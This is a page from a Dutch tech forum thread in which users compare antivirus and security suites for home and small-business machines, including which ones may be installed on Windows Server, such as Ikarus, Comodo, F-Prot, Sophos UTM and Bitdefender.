De free versie is officieel niet beschikbaar in Nederland. Je kunt het technisch gezien wel gebruiken wanneer je de taal op bijvoorbeeld Engels zet. De versie is gebaseerd op een oudere dan de huidige engine en heeft weinig instelmogelijkheden. Ik weet niet hoe het momenteel met updates zit maar ik had vroeger het idee dat die aardig frequent voorbij kwamen. Zelf zou ik voor een goedkope licentie gaan (er lopen vaak aanbiedingsacties) gezien je dan het volwaardige product kunt gebruiken met alle instelmogelijkheden etc.

Acties:
  • 0 Henk 'm!

• thalantis
  • Registratie: Augustus 1999
  • Laatst online: 26-01-2023

thalantis

12200 Wp

Ben op zoek naar een vervanger voor outpost security suite, deze zijn overgenomen door yandex en hij houd 31 dec op te bestaan. ik had een lifetime licentie en mocht op 5 pc's installeren.
Probleem wat ik heb is dat de meeste huis tuin en keuken security suites niet op windows server geinstalleerd mogen worden en laat ik daar nu net 1 van hebben draaien :)

Heeft iemand anders ervaringen met ikarus https://www.ikarussecurit...tection/ikarus-antivirus/
heb hier nu de 30 dagen proef van geinstalleerd maar dit is niet echt een security suite
Deze mag ook op een windows server geinstalleerd worden en als ik de 2 user licentie koop mag ik deze als thuisgebruiker op 6 machine's installeren (heb geen bedrijf)
Ikarus komt ook goed uit de testen die ik online heb gelezen

Ben dus eigelijk op zoek naar een security suite welke ook op windows server geinstalleerd mag worden, daarnaast heb ik nog 2 windows machine's en 3 macos machines, maar die laatste is niet perse noodzakelijk hier heb ik al intego op geinstalleerd.

Ben wel bereid wat te betalen voor security maar niet de hoofdprijs zoals bij Kaspersky (455 euro voor 3 jaar) http://www.kaspersky.com/...ity/small-office-security
Even als vergelijk Ikarus vraagt 165 euro voor 5 jaar.

[ Voor 3% gewijzigd door thalantis op 14-10-2016 10:57 ]

Jsunnyreports

Acties:
  • 0 Henk 'm!

• EricJH
Als je van Outpost komt dan is de gratis Comodo Internet Security suite een optie maar die kun je niet op Windows Server producten installeren. Maar het broertje Comodo Endpoint Security kun je wel op Windows Server installeren.

Acties:
  • 0 Henk 'm!

• prinsvlad
thalantis schreef op vrijdag 14 oktober 2016 @ 10:54:
Ben op zoek naar een vervanger voor outpost security suite, deze zijn overgenomen door yandex en hij houd 31 dec op te bestaan. ik had een lifetime licentie en mocht op 5 pc's installeren.
Probleem wat ik heb is dat de meeste huis tuin en keuken security suites niet op windows server geinstalleerd mogen worden en laat ik daar nu net 1 van hebben draaien :)

Heeft iemand anders ervaringen met ikarus https://www.ikarussecurit...tection/ikarus-antivirus/
heb hier nu de 30 dagen proef van geinstalleerd maar dit is niet echt een security suite
Deze mag ook op een windows server geinstalleerd worden en als ik de 2 user licentie koop mag ik deze als thuisgebruiker op 6 machine's installeren (heb geen bedrijf)
Ikarus komt ook goed uit de testen die ik online heb gelezen

Ben dus eigelijk op zoek naar een security suite welke ook op windows server geinstalleerd mag worden, daarnaast heb ik nog 2 windows machine's en 3 macos machines, maar die laatste is niet perse noodzakelijk hier heb ik al intego op geinstalleerd.

Ben wel bereid wat te betalen voor security maar niet de hoofdprijs zoals bij Kaspersky (455 euro voor 3 jaar) http://www.kaspersky.com/...ity/small-office-security
Even als vergelijk Ikarus vraagt 165 euro voor 5 jaar.
Heb je geen gebruik gemaakt van de overstap van Agnitum OSS naar Kaspersky dan?.

Ik wel nl. echter vind ik Kaspersky een draak van een suite en gebruik het niet........als je wilt kan ik informeren of het overdraagbaar is...

Acties:
  • 0 Henk 'm!

• thalantis

thalantis

12200 Wp

Nee ik heb daar geen gebruik van gemaakt want kaspersky kon ik niet op server installeren en ik noemde kaspersky als voorbeeld

Jsunnyreports

Acties:
  • +1 Henk 'm!
Er zijn vrijwel geen scanners voor consumenten die ook Windows server ondersteunen. Dan kom je al snel in de zakelijke markt terecht wat ook niet vreemd is. Een server vraagt doorgaans nu eenmaal een andere aanpak als het op virusscanner aankomt.

Acties:
  • 0 Henk 'm!

• prinsvlad
thalantis schreef op zaterdag 15 oktober 2016 @ 19:39:
Nee ik heb daar geen gebruik van gemaakt want kaspersky kon ik niet op server installeren en ik noemde kaspersky als voorbeeld
Ik gebruik een UTM van Sophos ( UTM 120 ) , je kan ook zelf een hardware pakketje in elkaar zetten en daarop de UTM software versie op installeren. Deze is gratis te gebruiken tot vijftig IP adressen voor thuis gebruik en voor het klein-bedrijf. De Sophos Firewall is eveneens gratis te gebruiken , echter met iets andere voorwaarden als ik mij niet vergis.

Acties:
  • 0 Henk 'm!

• gambieter
  • Registratie: Oktober 2006
  • Niet online

gambieter

Just me & my cat

Bor schreef op zondag 16 oktober 2016 @ 09:01:
Er zijn vrijwel geen scanners voor consumenten die ook Windows server ondersteunen. Dan kom je al snel in de zakelijke markt terecht wat ook niet vreemd is. Een server vraagt doorgaans nu eenmaal een andere aanpak als het op virusscanner aankomt.
F-prot zakelijk is nog steeds zeer betaalbaar: http://www.cyren.com/f-pr...or-windows-corporate.html

Die ondersteunt Windows en Windows Server, en is $50 voor 1-10 users.

I had a decent lunch, and I'm feeling quite amiable. That's why you're still alive.

Acties:
  • 0 Henk 'm!

• thalantis

thalantis

12200 Wp

prinsvlad schreef op maandag 17 oktober 2016 @ 01:07:
[...]

Ik gebruik een UTM van Sophos ( UTM 120 ) , je kan ook zelf een hardware pakketje in elkaar zetten en daarop de UTM software versie op installeren. Deze is gratis te gebruiken tot vijftig IP adressen voor thuis gebruik en voor het klein-bedrijf. De Sophos Firewall is eveneens gratis te gebruiken , echter met iets andere voorwaarden als ik mij niet vergis.
Heb zelf een UTM 220 appliance via ebay op de kop getikt, maar ik zou graag daarnaast een virus scanner en het liefst een security suite van een andere vendor hebben.

F-prot is alleen anti virus volgens mij.

Jsunnyreports

Acties:
  • 0 Henk 'm!

• prinsvlad
Echt niet nodig ben ik van mening. Via de UTM kan je alle devices voorzien van Endpoint Protection , al dan niet met Tamper Protection zodat gebruikers niet kunnen knoeien met instellingen , zoals je eventueel wenst. Tevens werkt dit icm de UTM onvergevelijk goed!. Alles per gebruiker is in te stellen ,Global of User afhankelijk. Ook zonder Endpoint Protection werkt de UTM , mits juist ingesteld uitermate goed.

Acties:
  • 0 Henk 'm!

• thalantis

thalantis

12200 Wp

Heb nu de UTM sophos endpoint protection geinstalleerd op mijn server, zal kijken of dit bevalt,

Bevalt nu al niet site's die niet laden, chrome die niet op wil starten, hij wil niet met heimdal security samen werken terwijl ik wel uninstall 3rdparty heb aangevinkt.

f-prot maar eens proberen

[ Voor 51% gewijzigd door thalantis op 19-10-2016 15:02 ]

Jsunnyreports

Acties:
  • 0 Henk 'm!

• prinsvlad
thalantis schreef op woensdag 19 oktober 2016 @ 10:47:
Heb nu de UTM sophos endpoint protection geinstalleerd op mijn server, zal kijken of dit bevalt,

Bevalt nu al niet site's die niet laden, chrome die niet op wil starten, hij wil niet met heimdal security samen werken terwijl ik wel uninstall 3rdparty heb aangevinkt.

f-prot maar eens proberen
Voor uitgebreide info en tips om je UTM correct te configureren lees dit eens : https://drashna.net/blog/sophos-utm/

Acties:
  • 0 Henk 'm!

• MrDry
  • Registratie: December 2001
  • Laatst online: 13-10 13:29

MrDry

Desperados!

Ik ben voor een klein bedrijf (2 windows servers en 10 wokstations) op zoek naar een virusscan pakket. Op het moment gebruiken we McAfee Active Virus Defense SMB. Hier zit een management pakket bij, een scanner voor alle clients en een scanner voor exchange.

Van het nieuwe pakket verwacht ik iets gelijks. Management voor clients is an sich wat overdreven voor de hoeveelheid clients maar het is wel makkelijk om te weten of alle clients up--to-date zijn.

Mijn oog is gevallen op Bitdefender. Scoort op alle fronten beter dan McAfee. Vooral qua performance maar ook qua detecties.

Bitdefender GravityZone voor SMB is er in 2 smaken: met en zonder exchange. De variant met exchange is ca 50% duurder.
Voegt het extra zekerheid toe om, als je een lokale exchange server draaien hebt, een scanner voor exchange te hebben of is dit alleen een verkoopargument zonder toegevoegde waarde?

Quod licet lovi, non licet bovi

Acties:
  • 0 Henk 'm!

• thalantis

thalantis

12200 Wp

prinsvlad schreef op woensdag 19 oktober 2016 @ 23:41:
[...]

Voor uitgebreide info en tips om je UTM correct te configureren lees dit eens : https://drashna.net/blog/sophos-utm/
Bedankt voor de info maar ik heb de UTM 220 nu bijna een jaar dus die werkt wel, ik heb de endpoint protection nu op 2 andere machine's wel geïnstalleerd en daar doen ze wel wat ze moeten doen, ik denk gewoon een combinatie met Heimdal security software.

Jsunnyreports

Acties:
  • 0 Henk 'm!

• desalniettemin
  • Registratie: Juli 2010
  • Laatst online: 13:03
De dagelijkse popup van Avira free liet net dit zien, een gratis upgrade:

https://www.avira.com/en/...tem=Fall2016&cservices=17

Doen of niet?

Acties:
  • 0 Henk 'm!

• Tomba
  • Registratie: Mei 2000
  • Laatst online: 13-10 07:18

Tomba

Quis custodiet ipsos custodes?

Voor de liefhebber, BitDefender 2017 is uit. Internet Security vertraagt bij mij nog altijd het openen van Explorer.exe (net als 2015-2016) maar goed wel 1 vd beste qua detectie!

tomba.tweakblogs.net || Mijn V&A

Acties:
  • 0 Henk 'm!
Tomba schreef op maandag 24 oktober 2016 @ 19:28:
Voor de liefhebber, BitDefender 2017 is uit. Internet Security vertraagt bij mij nog altijd het openen van Explorer.exe (net als 2015-2016) maar goed wel 1 vd beste qua detectie!
Die is al een aantal weken uit ;) Je kunt deze versie gebruiken zolang je maar een valide licentie hebt (dus een licentie voor 2016 werkt ook).

Pagina: 1 ... 22 ... 34 Laatste